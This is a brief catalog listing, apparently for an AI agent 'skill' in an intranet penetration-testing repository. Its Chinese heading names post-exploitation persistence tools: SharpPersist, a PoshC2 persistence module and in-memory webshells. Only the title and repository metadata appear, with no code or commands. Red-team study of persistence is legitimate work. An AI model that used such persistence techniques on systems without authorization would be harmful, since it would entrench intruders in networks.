# 工具: SharpPersist / PoshC2持久化模块 / 内存马(Web场景)

Shortened here. Read the whole file on GitHub.

Signals

GitHub stars
115
Forks
4
Last commit
Sep 2026
Advanced
Catalog kind
skill
Gateway key
intranet-penetration-testing
Source
github.com/langbyyi/cyberstrikeai-src